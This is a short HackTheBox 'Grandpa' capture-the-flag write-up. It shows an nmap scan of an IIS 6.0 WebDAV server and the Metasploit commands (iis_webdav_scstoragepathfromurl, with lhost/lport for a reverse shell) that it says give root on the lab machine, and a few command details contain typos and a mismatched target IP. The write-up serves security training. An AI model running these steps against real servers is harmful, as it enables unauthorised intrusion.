Hackthebox Grandpa writeup

0
(0)
Hackthebox Grandpa writeup

Commands used

1-nmap -sC -v 10.10.10.14
2-msfconsle
3-use exploit/windows/iis/iis_webdav_scstoragepathfromurl
4-set targeturi /_vti_bin
5-set rhosts 10.10.14.20
5-set lhost your_ip
6-set lport 1234
7-run

Steps invloved

1-Port Scanning
2-Searching exploit for IIS 6.0
3-Exploiting IIS with metasploit

Port Scanning

Nmap scan report for 10.10.10.14
Host is up (0.44s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
80/tcp open http
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|http-title: Under Construction | http-webdav-scan: | WebDAV type: Unkown | Server Type: Microsoft-IIS/6.0 | Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH | Server Date: Thu, 16 Apr 2020 15:05:34 GMT
NSE: Script Post-scanning.
Initiating NSE at 11:01
Completed NSE at 11:01, 0.00s elapsed
Initiating NSE at 11:01
Completed NSE at 11:01, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 45.31 seconds
Raw packets sent: 2017 (88.724KB) | Rcvd: 20 (888B)

Searching exploit for IIS 6.0

https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_scstoragepathfromurl
Hackthebox Grandpa writeup

Exploiting IIS with metasploit

Hackthebox Grandpa writeup

And with this we directly get the root

Hackthebox Grandpa writeup

How useful was this post?

Click on a star to rate it!

Average rating 0 / 5. Vote count: 0

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Leave a Comment

X
wpChatIcon
0 Shares
Tweet
Share
Share
Pin